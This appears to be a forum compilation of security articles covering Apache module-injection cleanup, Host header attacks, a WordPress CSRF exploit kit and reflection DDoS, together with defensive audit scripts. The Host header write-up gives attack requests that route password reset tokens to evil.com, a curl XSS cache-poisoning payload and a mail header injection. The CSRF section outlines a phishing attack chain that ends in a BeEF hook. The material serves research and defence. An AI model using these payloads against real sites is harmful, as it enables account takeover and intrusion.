I can't remember the last time we found the LoadModule call being referenced in the httpd.conf; this means that they're loading it via other configuration files, so it's a good thing to crawl through all your configuration files in /etc/httpd/conf.d as they are being loaded when Apache runs. A quick and easy way to do this:

# grep -ri "LoadModule" /etc/

I'd start in your /etc/ directory, it's the default location for most distros, but in some instances you might need to look elsewhere; it just depends on your distribution and configuration.

Don't forget to remove the module as well, not just the LoadModule call:

# rm -rf /etc/httpd/modules/mod_uni_config.so

And reset the immutable attribute on your configuration files so that automated attacks are stopped in their tracks, but remove the append attribute.

# chattr +i /etc/httpd/conf.d/ssl.conf

Do remember that both these changes were made as a user with administrative privileges. This means that removing or making these changes is just half the battle. If you cannot definitively identify the vector, it might be time to reimage the box or migrate to a new one. It will not do you much good if you remove it but leave everything else in place; they'll likely continue to gain access. The first thing I'd recommend is purging all accounts that have access. I'd then ensure that I'm no longer using passwords to authenticate and start adding a few layers of defense.

What Does This Tell Us?

We're in for a treat. I'm perhaps most concerned about the attack on the Apache binaries more so than anything, as it's so difficult to detect and fix; it does tell us that we're in for some interesting times. We know that websites are high value targets for attackers and that they make up 90% of the unknown malware to traditional AVs. One very common trend in all these attacks is how they're all being used to distribute payloads created by the BlackHole Exploit Kit. This shows a level of sophistication in that segment of attackers that we are not seeing with other groups.

Sursa: Apache Web Server Attacks Continue to Evolve | Sucuri Blog
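The three indicators the Sucuri post walks through (a PHP handler bound to .js plus auto_prepend_file, a LoadModule hiding in a conf.d fragment, and config files made immutable with chattr) can be checked in one pass. The script below is an added example, not code from the post or from Apache; the config tree it builds under AUDIT_ROOT and the lsattr sample are constructed data, not taken from a real server.

```shell
#!/bin/sh
# Added example (not from the Sucuri post): audit an Apache config tree for the
# three indicators described above. AUDIT_ROOT, everything under it and
# SAMPLE_LSATTR are constructed sample data.

AUDIT_ROOT="${AUDIT_ROOT:-$(mktemp -d)}"
mkdir -p "$AUDIT_ROOT/httpd/conf" "$AUDIT_ROOT/httpd/conf.d"

# Constructed tree: a clean httpd.conf and ssl.conf, a php.conf carrying the
# injected <Files> block the post shows, and a conf.d fragment that loads a
# module httpd.conf never mentions.
cat > "$AUDIT_ROOT/httpd/conf/httpd.conf" <<'EOF'
ServerRoot "/etc/httpd"
LoadModule php5_module modules/libphp5.so
Include conf.d/*.conf
EOF
cat > "$AUDIT_ROOT/httpd/conf.d/ssl.conf" <<'EOF'
Listen 443
SSLEngine on
EOF
cat > "$AUDIT_ROOT/httpd/conf.d/php.conf" <<'EOF'
AddHandler php5-script .php
<Files ~ "\.js$">
AddHandler php5-script .js
php_value auto_prepend_file /usr/local/lib/php.lib
php_flag display_errors Off
</Files>
EOF
cat > "$AUDIT_ROOT/httpd/conf.d/zz_extra.conf" <<'EOF'
LoadModule uni_config_module modules/mod/mod_uni_config.so
EOF

# Indicator 1: a PHP handler bound to an extension that should never execute
# (.js/.css/.htm/.html), or any auto_prepend_file at all. Output is grep's
# file:line:text; exit status 1 means nothing matched.
find_prepend_abuse() {
    grep -rinE 'AddHandler[[:space:]]+php[^[:space:]]*[[:space:]]+.*\.(js|css|html?)|auto_prepend_file' "$1"
}

# Indicator 2: LoadModule directives anywhere other than the main httpd.conf.
# Distributions do ship legitimate LoadModule lines in conf.d, so each hit still
# needs the referenced .so checked (path, owner, package ownership).
find_loadmodule_outside_main() {
    grep -rin '^[[:space:]]*LoadModule' "$1" | grep -v '/httpd\.conf:'
}

# Indicator 3: lsattr output on stdin, one "flags path" line each; print the
# paths whose flag field carries i (immutable) or a (append-only). The flag
# field is letters and dashes only, so a path is never mistaken for it.
flag_immutable() {
    awk '$1 ~ /^[-a-zA-Z]+$/ && (index($1, "i") || index($1, "a")) { print $2 }'
}

# Constructed lsattr output in the shape the post shows; a real run would be
# "lsattr /etc/httpd/conf.d/* /etc/httpd/conf/*".
SAMPLE_LSATTR='----ia------- /etc/httpd/conf.d/ssl.conf
------------- /etc/httpd/conf.d/php.conf
----i--------e-- /etc/httpd/conf/httpd.conf'

# Run all three indicators over a tree and print the hits; returns 1 if any fired.
run_audit() {
    hits=0
    echo "== PHP handler on non-PHP extension / auto_prepend_file =="
    find_prepend_abuse "$1" && hits=1
    echo "== LoadModule outside httpd.conf =="
    find_loadmodule_outside_main "$1" && hits=1
    echo "== immutable/append-only attributes (from lsattr output) =="
    printf '%s\n' "$2" | flag_immutable | grep . && hits=1
    return $hits
}

run_audit "$AUDIT_ROOT" "$SAMPLE_LSATTR" || echo "audit: indicators present, review the lines above"
# Remove "$AUDIT_ROOT" when finished with the constructed tree.
```

Point AUDIT_ROOT at /etc/httpd (and feed flag_immutable real lsattr output) to run the same checks on a live box.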
-
[h=1]Google pays record $31K bounty for Chrome bugs[/h] [h=2]Rewards European researcher with $31,336 payment for reporting three vulnerabilities in JavaScript 3-D API[/h] By Gregg Keizer Computerworld - Google this month paid a security researcher $31,336 for reporting a trio of bugs in Chrome. The amount paid to Ralf-Philipp Weinmann, a research associate at the University of Luxembourg's Interdisciplinary Centre for Security, Reliability and Trust, was a record in Google's bug bounty program. Google has paid out more in various contests it's run or co-sponsored, including $100,000 to a two-man team from MWR InfoSecurity at last month's Pwn2Own. Google cited Weinmann's thoroughness in a short message two weeks ago acknowledging his bounty. "We're pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up," said Ben Henry, a Google technical program manager, in a blog post. The three-bug chain credited to Weinmann exploited O3D, a JavaScript API (application programming interface) designed for crafting interactive 3-D graphics-based Web applications. The API and supporting browser plug-in were created by Google, with a preliminary version of the latter released in 2009. All three of the vulnerabilities were labeled "High," the second-most-serious ranking in Chrome's four-step scoring system. Weinmann's compensation was markedly more than the norm for Chrome's bounty program. Last August, however, Google announced bigger bounties -- saying the increase had been prompted by a decline in submissions -- and left the door open to a more flexible approach to issuing rewards and bonuses. So far this year, Google has paid nearly $188,000 in bounties and prizes for Chrome and Chrome OS, including those at Pwn2Own and Google's own Pwnium contest, both held in early March at a Vancouver, British Columbia, security conference. 
During Pwnium, a researcher known only as "Pinkie Pie" received $40,000 for a partial exploit of Google's browser-based operating system. Mozilla, developer of Firefox, also pays bug bounties, but unlike Google, does not release the names of researchers or the payments they receive. This article, Google pays record $31K bounty for Chrome bugs, was originally published at Computerworld.com.
-
[h=3]Windbg Tricks - Module Relocation[/h]

When ASLR is not supported, pseudo ASLR is often used to introduce a degree of entropy into where a module is loaded in memory. The basic idea behind pseudo ASLR is to pre-allocate memory at the location of a module's preferred base address. This forces the module to be loaded at a non-predetermined address. See this for more details.

I stumbled across the windbg command !imgreloc the other day. It can be used to show all modules that have been relocated, and what their original preferred base address is. Below is the output when run while attached to firefox.exe (see this ticket about dll blocking and this firefox ticket for a specific history of pseudo ASLR in firefox):

0:017> !imgreloc
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
00400000 firefox - at preferred address
004e0000 nspr4 - RELOCATED from 10000000
00510000 smime3 - RELOCATED from 10000000
00530000 nss3 - RELOCATED from 10000000
005d0000 nssutil3 - RELOCATED from 10000000
005f0000 plc4 - RELOCATED from 10000000
00600000 plds4 - RELOCATED from 10000000
00610000 ssl3 - RELOCATED from 10000000
00640000 xpcom - RELOCATED from 10000000
01220000 browserdirprovider - RELOCATED from 10000000
01540000 brwsrcmp - RELOCATED from 10000000
01de0000 nssdbm3 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
036a0000 softokn3 - RELOCATED from 10000000
03980000 freebl3 - RELOCATED from 10000000
039d0000 nssckbi - RELOCATED from 10000000
10000000 xul - at preferred address
59a60000 dbghelp - at preferred address
5ad70000 uxtheme - at preferred address

0:017> .shell -ci "!imgreloc" findstr RELOCATED
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
004e0000 nspr4 - RELOCATED from 10000000
00510000 smime3 - RELOCATED from 10000000
00530000 nss3 - RELOCATED from 10000000
005d0000 nssutil3 - RELOCATED from 10000000
005f0000 plc4 - RELOCATED from 10000000
00600000 plds4 - RELOCATED from 10000000
00610000 ssl3 - RELOCATED from 10000000
00640000 xpcom - RELOCATED from 10000000
01220000 browserdirprovider - RELOCATED from 10000000
01540000 brwsrcmp - RELOCATED from 10000000
01de0000 nssdbm3 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
036a0000 softokn3 - RELOCATED from 10000000
03980000 freebl3 - RELOCATED from 10000000
039d0000 nssckbi - RELOCATED from 10000000

Searching for preferred instead of RELOCATED will yield a list of modules that should remain at their preferred address (and thus be usable for ROP or other such techniques).

Posted by d0c.s4vage

Source: d0c_s4vage: Windbg Tricks - Module Relocation
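As an added example (not part of d0c.s4vage's post): a small parser for the !imgreloc listing format above that pulls out the modules still sitting at their preferred base, the ones an auditor would want rebuilt with relocation/ASLR support, and shows how many DLLs competed for the same preferred base. The sample listing is a constructed excerpt of the output shown above.

```python
import re
from collections import defaultdict

# Constructed excerpt of "!imgreloc" output (same format as the firefox.exe listing above).
SAMPLE_IMGRELOC = """\
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
00400000 firefox - at preferred address
004e0000 nspr4 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
10000000 xul - at preferred address
59a60000 dbghelp - at preferred address
5ad70000 uxtheme - at preferred address
"""

# One listing line: load base, module name, then either the relocation note or the
# "at preferred address" marker.
LINE_RE = re.compile(
    r"^(?P<base>[0-9a-fA-F]{8})\s+(?P<module>\S+)\s+-\s+"
    r"(?:RELOCATED from (?P<preferred>[0-9a-fA-F]{8})|at preferred address)$"
)


def parse_imgreloc(text):
    """Return a list of (module, load_base, preferred_base, relocated) tuples.

    Lines that do not look like listing entries (the windbg prompt, blank lines)
    are skipped so raw .shell output can be pasted in unchanged.
    """
    modules = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        base = int(m.group("base"), 16)
        preferred = m.group("preferred")
        if preferred is None:
            modules.append((m.group("module"), base, base, False))
        else:
            modules.append((m.group("module"), base, int(preferred, 16), True))
    return modules


def predictable_modules(modules):
    """Modules loaded at their preferred base.

    Their code sits at the same address in every process, which is what the post
    means by "usable for ROP": these are the binaries to rebuild with relocation
    support or to keep out of the process.
    """
    return sorted(name for name, _, _, relocated in modules if not relocated)


def preferred_base_collisions(modules):
    """Map preferred base -> modules that wanted it, for bases requested more than once.

    Only one image can occupy a base, so the others were relocated regardless of
    pseudo ASLR; a long list under 0x10000000 is the linker default, not entropy.
    """
    wanted = defaultdict(list)
    for name, _, preferred, _ in modules:
        wanted[preferred].append(name)
    return {hex(base): sorted(names) for base, names in wanted.items() if len(names) > 1}


if __name__ == "__main__":
    mods = parse_imgreloc(SAMPLE_IMGRELOC)
    print("at preferred address:", predictable_modules(mods))
    print("preferred-base collisions:", preferred_base_collisions(mods))
```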
-
[h=2]WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins[/h]

Over the last few weeks I've been on a roll with finding CSRF vulnerabilities in WordPress plugins. That's all nice and good, but when you've got 30 of them, it's a shame not to take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine, and most importantly to hopefully inspire others to think along these lines. This project is solely meant for educational purposes, not for attacks against running services or people.

https://github.com/CharlieEriksen/WP-CSRF-POC

The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out:

- It's not designed to simply spray and pray. You define the target URLs you want to hit and then you have a unique URL for each blog you can go phishing with. Then it will use the onload function of an img or script tag to detect the presence of the vulnerable plugin on the target blog on request through the pre-defined unique URL.
- We generate the payload on request with a uniquely identifying URL to ensure it's not easy to extract the exploits.
- You get max 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back. Makes researchers' lives harder.
- We deliver a BeEF hook. Because BeEF is cool and god damn tasty.

I want to stress especially the "novel" use of the onload function of img/script tags. People in the past have used it to detect the presence of different host-names/"port scanning" internal systems by vectoring through a hooked browser. I say that's cool and all, but you can take that further and use it to detect the presence of a plugin on a target on demand, making you able to be much more sneaky. When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script.

A normal series of events would be:

1. An attacker sets up this script with pre-defined targets (targets variable) with a unique URL for each target blog
2. The attacker then spams out a link to the running script with the unique URL for each target blog
3. When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL
4. The script then generates a random URL for each exploit we have, with the target blog URL put in, that can then be requested
5. We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog
6. If none of the plugins are detected on the blog, we redirect to Google
7. If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4
8. The exploit is now written out to the user, submitting the CSRF with an XSS payload pointing to our BeEF instance
9. We now delete all cached exploits made for the requesting IP

There are a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much, much dirtier, and not the goal of this proof of concept. I urge anybody who finds the concept useful to run with it if they so desire. I'll be adding more exploits as advisories are published. Otherwise, I'm curious to hear people's thoughts on this.

Source: Wordpress CSRF Exploit kit – A novel approach to exploiting Wordpress plugins | ceriksen.com
-
[h=3]Practical HTTP Host header attacks[/h]
[h=3]Password reset and web-cache poisoning[/h]
[h=4](And a little surprise in RFC-2616)[/h]

[h=3]Introduction[/h]

How does a deployable web application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it, with code equivalent to:

<link href="http://_SERVER['HOST']" (Joomla)

...and append secret keys and tokens to links containing it:

<a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others)

...and even directly import scripts from it:

<script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various)

There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning: manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails, where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers.

[h=3]Password reset poisoning[/h]

Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key, places it in a link to the site, and emails it to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account.

The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header:

> POST /password/reset HTTP/1.1
> Host: evil.com
> ...
> csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin

This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part. Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination.

In other cases, the Host may be URL-decoded and placed directly into the email header, allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves; Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: attacker@evil.com followed by an attachment engineered to trigger a bounce, like a zip bomb.

[h=3]Cache poisoning[/h]

Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Bueno in 2008. 5 years later there's no shortage of sites implicitly trusting the host header, so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource:

> GET /index.html HTTP/1.1
> Host: example.com

> GET /index.html HTTP/1.1
> Host: evil.com

So, to persuade a cache to serve our poisoned response to someone else we need to create a disconnect between the host header the cache sees and the host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first host header it sees to identify the request, but Apache concatenates all host headers present and Nginx uses the last host header. This means that you can poison a Varnish cache with URLs pointing at evil.com by making the following request:

> GET / HTTP/1.1
> Host: example.com
> Host: evil.com

Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as:

curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" http://example.com/ | fgrep cow\"

This will create the following request:

> GET / HTTP/1.1
> Host: cow"onerror='alert(1)'rel='stylesheet'

The response should show a poisoned <link> element:

<link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/>

To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup.

[h=3]'Secured' configurations[/h]

So far I've assumed that you can make an HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple.

Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. As such, it's possible to pass requests with arbitrary host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising that users create a dummy default-vhost to act as a catchall for requests with unexpected Host headers, ensuring that Django applications never got passed requests with unexpected Host headers.

The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update addons.mozilla.org, which I discovered in April 2012 with the following request:

> POST /en-US/firefox/user/pwreset HTTP/1.1
> Host: addons.mozilla.org
> X-Forwarded-Host: evil.com

Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax:

> POST /en-US/firefox/user/pwreset HTTP/1.1
> Host: addons.mozilla.org:@passwordreset.net

This resulted in the following (admittedly suspicious) password reset link:

https://addons.mozilla.org:@passwordreset.net/users/pwreset/3f6hp/3ab-9ae3db614fc0d0d036d4

If you click it, you'll notice that your browser sends the key to passwordreset.net before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it: https://www.djangoproject.com/weblog/2012/oct/17/security/

Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links:

> POST /en-US/firefox/users/pwreset HTTP/1.1
> Host: addons.mozilla.org: www.securepasswordreset.com

Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely. However, the arguably ultimate authority on virtual hosting, RFC2616, has the following to say:

5.2 The Resource Identified by a Request
[...] If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored.

The result? On Apache and Nginx (and all compliant servers) it's possible to route requests with arbitrary host headers to any application present by using an absolute URI:

> POST https://addons.mozilla.org/en-US/firefox/users/pwreset HTTP/1.1
> Host: evil.com

This request results in a SERVER_NAME of addons.mozilla.org but an HTTP['HOST'] of evil.com. Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information on the difference between these two variables.

Django fixed this in February 2013 by enforcing a whitelist of allowed hosts. See the documentation for more details. However, these attack techniques still work fine on many other web applications.

[h=3]Securing servers[/h]

Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible.

A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file:

import std;
sub vcl_recv {
    # merge duplicate Host headers into one value, so the cache and the
    # backend key on the same host (collect lives in the std vmod imported above)
    std.collect(req.http.host);
}

[h=3]Securing applications[/h]

Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient, solution is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration.

[h=3]Further research[/h]

- More effective / less inconvenient fixes
- Automated detection
- Exploiting wildcard whitelists with XSS & window.history
- Exploiting multipart password reset emails by predicting boundaries
- Better cache fuzzing (trailing Host headers?)

Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches. Feel free to drop a comment, email or DM me if you have any observations or queries.

Source: http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
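The application-side checks the article argues for, as an added example that is not from the article, Django or Gallery: exactly one Host header, an all-digit port, agreement between an absolute request-URI and the Host header, an allowlist, and reset links built from configuration rather than from the request. ALLOWED_HOSTS, CANONICAL_ORIGIN and the request strings are assumed values for the example.

```python
import re
from urllib.parse import urlsplit

# Names this deployment answers for: the whitelist approach the article credits
# to Django. Assumed values for the example.
ALLOWED_HOSTS = {"example.com", "addons.mozilla.org"}

# Origin used when building absolute links such as password reset URLs. It comes
# from configuration, never from the request. Assumed value for the example.
CANONICAL_ORIGIN = "https://example.com"

# host[:port] with an all-digit port: "site:@other", "site: other" and anything
# containing '@' or a space fail to match.
HOST_RE = re.compile(r"^(?P<name>[A-Za-z0-9.-]+)(?::(?P<port>[0-9]{1,5}))?$")


class BadHost(ValueError):
    """Raised when the request carries a Host value the application must not trust."""


def parse_request_head(raw):
    """Split a raw request head into (method, request_target, [(name, value), ...])."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line:          # blank line ends the head
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, headers


def effective_host(raw, allowed=ALLOWED_HOSTS):
    """Return the trusted host name for a request, or raise BadHost.

    Each check maps to a trick from the article:
      * duplicate Host headers (cache and application would disagree),
      * ":@other" and ": other" in the port position,
      * an absolute request-URI whose host differs from the Host header,
      * a host that is simply not ours.
    X-Forwarded-Host is ignored entirely, as Django does by default.
    """
    _method, target, headers = parse_request_head(raw)
    host_values = [v for n, v in headers if n == "host"]
    if len(host_values) != 1:
        raise BadHost("expected exactly one Host header, got %d" % len(host_values))
    m = HOST_RE.match(host_values[0])
    if not m:
        raise BadHost("malformed Host header: %r" % host_values[0])
    name = m.group("name").lower().rstrip(".")
    # RFC 2616 5.2: with an absolute Request-URI the URI's host is authoritative,
    # so a Host header that disagrees with it is a routing trick, not a client.
    if "://" in target:
        uri_host = (urlsplit(target).hostname or "").lower()
        if uri_host != name:
            raise BadHost("request-URI host %r disagrees with Host %r" % (uri_host, name))
    if name not in allowed:
        raise BadHost("host %r is not in the allowlist" % name)
    return name


def rejects(raw):
    """True if effective_host refuses the request (convenience for demos and tests)."""
    try:
        effective_host(raw)
    except BadHost:
        return True
    return False


def password_reset_link(raw, key):
    """Build the reset link from CANONICAL_ORIGIN, so the requester's Host header
    can never end up in the email; that is the Gallery/Django bug described above."""
    effective_host(raw)  # refuse to act at all on a request with an untrusted Host
    return "%s/password/reset?key=%s" % (CANONICAL_ORIGIN, key)


if __name__ == "__main__":
    poisoned = "POST /password/reset HTTP/1.1\r\nHost: evil.com\r\n\r\n"
    print("evil.com rejected:", rejects(poisoned))
    clean = "POST /password/reset HTTP/1.1\r\nHost: example.com\r\n\r\n"
    print(password_reset_link(clean, "constructed-example-key"))
```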
-
[h=1]Sagan v0.3.0 Released[/h]

Sagan is an open source (GNU/GPLv2) high performance, real-time log analysis & correlation engine that runs under *nix operating systems (Linux/FreeBSD/OpenBSD/etc). It is written in C and uses a multi-threaded architecture to deliver high performance log & event analysis. Sagan's structure and rules work similarly to the Sourcefire "Snort" IDS/IPS engine. This was intentionally done to maintain compatibility with rule management software (oinkmaster/pulledpork/etc) and allows Sagan to correlate log events with your Snort IDS/IPS system. Sagan can also write to Snort IDS/IPS databases via Unified2/Barnyard2. Sagan is compatible with all Snort "consoles". For example, Sagan will work with Snorby (http://www.snorby.org), Sguil (http://sguil.sourceforge.net), BASE, the Prelude IDS framework (https://www.prelude-ids.org) and proprietary consoles (to name a few).

[h=3]Changelog v0.3.0[/h]

- The biggest change is that Sagan is now capable of utilizing all CPUs/cores. While Sagan has always been multi-threaded to prevent I/O blocking, previous versions could only utilize one core for event analysis. This is no longer the case: Sagan will now use any and all CPUs available, which means that Sagan can digest, parse and analyze an even higher number of events per second.
- Introduction of "processors." Processors provide Sagan the ability to analyze logs using methods other than traditional signature-based technology. Current processors are:
  - Blacklist – Search log messages for blacklisted IP addresses.
  - Search – Search logs for keyword terms (i.e. domain names, etc.)
  - Track Clients – Informs you when systems aren't logging properly.
  - Websense Threatseeker – Queries the Websense Threatseeker network for reputation data (not included with the GPLv2 release).
  More processors are currently in development.
- The direct SQL output plugin has been removed, in order to maintain full compatibility with Snort. To write to a SQL database, use Unified2 output and Barnyard2.
- Introduction of port variables ($SSH_PORT, $DNS_PORT) in rules.
- More normalization and parsing options (parse_src_ip, parse_proto, etc).
- Sagan currently has over five thousand signatures/rules.

More Information: here
Download Sagan v0.3.0

Source: Sagan v0.3.0 Released | ToolsWatch.org - The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
-
[h=1]Aging networking protocols abused in DDoS attacks[/h]
[h=2]Printers, routers and many other Internet-connected devices can be used in an attack[/h]
[h=3]By Jeremy Kirk[/h]
May 01, 2013 — IDG News Service — Aging networking protocols still employed by nearly every Internet-connected device are being abused by hackers to conduct distributed denial-of-service (DDoS) attacks.

Security vendor Prolexic found that attackers are increasingly using the protocols for what it terms "distributed reflection denial-of-service attacks" (DrDos), where a device is tricked into sending a high volume of traffic to a victim's network.

"DrDos protocol reflection attacks are possible due to the inherent design of the original architecture," Prolexic wrote in a white paper. "When these protocols were developed, functionality was the main focus, not security."

Government organizations, banks and companies are targeted by DDoS attacks for a variety of reasons. Hackers sometimes use DDoS attacks to draw attention away from other mischief or want to disrupt an organization for political or philosophical reasons.

One of the targeted protocols, known as Network Time Protocol (NTP), is used in all major operating systems, network infrastructure and embedded devices, Prolexic wrote. It is used to synchronize clocks among computers and servers. A hacker can launch an attack against NTP by sending many requests for updates. By spoofing the origin of the requests, the NTP responses can be directed at a victim host. It appears the attackers are abusing a monitoring function in the protocol called NTP mode 7 (monlist). The gaming industry has been targeted by this style of attack, Prolexic said.

Other network devices, such as printers, routers, IP video cameras and a variety of other Internet-connected equipment use an application layer protocol called Simple Network Management Protocol (SNMP). SNMP communicates data about device components, Prolexic wrote, such as measurements or sensor readings. SNMP devices return three times as much data as when they're pinged, making them an effective way to attack. Again, an attacker will send a spoofed IP request to an SNMP host, directing the response to a victim. Prolexic wrote there are numerous ways to mitigate an attack. The best advice is to disable SNMP if it is not needed.

The U.S. Computer Emergency Readiness Team warned administrators in 1996 of a potential attack scenario involving another protocol, Character Generator Protocol, or CHARGEN. It is used as a debugging tool since it sends data back regardless of the input. But Prolexic wrote that it "may allow attackers to craft malicious network payloads and reflect them by spoofing the transmission source to effectively direct it to a target. This can result in traffic loops and service degradation with large amounts of network traffic." CERT recommended at that time to disable any UDP (User Datagram Protocol) service such as CHARGEN if it isn't needed.

Source: Aging networking protocols abused in DDoS attacks - CSO Online - Security and Risk
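Added example, not from the Prolexic paper or the article: flow-record checks for the reflection pattern described above, from the victim's side (replies from the NTP, SNMP and CHARGEN ports that the victim never asked for) and from a server operator's side (bytes sent back per byte received, per client, which is how a monlist-style amplifier shows up). The flow records, addresses and the 20x threshold are constructed sample data.

```python
import csv
import io
from collections import defaultdict

# UDP services the article names as reflectors, keyed by their well-known port.
REFLECTOR_PORTS = {123: "NTP", 161: "SNMP", 19: "CHARGEN"}

# Constructed flow records, not captured traffic. One row per unidirectional flow:
# ts, source, source port, destination, destination port, bytes, packets.
# 192.0.2.9 plays the victim; 198.51.100.10 is an NTP server "we" operate.
SAMPLE_FLOWS = """\
ts,src,sport,dst,dport,bytes,pkts
1,203.0.113.5,40000,198.51.100.10,123,48,1
2,198.51.100.10,123,203.0.113.5,40000,48,1
3,203.0.113.66,123,192.0.2.9,40123,44000,100
4,203.0.113.67,123,192.0.2.9,40123,43560,99
5,203.0.113.68,161,192.0.2.9,40124,3000,2
6,192.0.2.9,51000,203.0.113.70,161,120,1
7,203.0.113.70,161,192.0.2.9,51000,360,1
8,203.0.113.80,53,192.0.2.9,40200,512,1
9,203.0.113.99,40500,198.51.100.10,123,50,1
10,198.51.100.10,123,203.0.113.99,40500,44000,100
"""


def parse_flows(text):
    """Parse the CSV above into dicts with integer ports, bytes, packets and timestamps."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({"ts": int(r["ts"]), "src": r["src"], "sport": int(r["sport"]),
                     "dst": r["dst"], "dport": int(r["dport"]),
                     "bytes": int(r["bytes"]), "pkts": int(r["pkts"])})
    return rows


def unsolicited_reflections(flows, victim):
    """Victim-side view of a DrDoS.

    The attacker spoofs the victim's address, so the victim receives replies from
    NTP/SNMP/CHARGEN servers it never queried. Any reply from a reflector port with
    no earlier request from the victim to that (server, port) is counted per
    service: total bytes, packets and distinct reflectors.
    """
    asked = set()
    hits = defaultdict(lambda: {"bytes": 0, "pkts": 0, "sources": set()})
    for f in sorted(flows, key=lambda f: f["ts"]):
        if f["src"] == victim and f["dport"] in REFLECTOR_PORTS:
            asked.add((f["dst"], f["dport"]))           # a real query from the victim
        elif f["dst"] == victim and f["sport"] in REFLECTOR_PORTS:
            if (f["src"], f["sport"]) in asked:
                continue                                 # legitimate reply, skip
            svc = REFLECTOR_PORTS[f["sport"]]
            hits[svc]["bytes"] += f["bytes"]
            hits[svc]["pkts"] += f["pkts"]
            hits[svc]["sources"].add(f["src"])
    return {svc: {"bytes": h["bytes"], "pkts": h["pkts"], "sources": len(h["sources"])}
            for svc, h in hits.items()}

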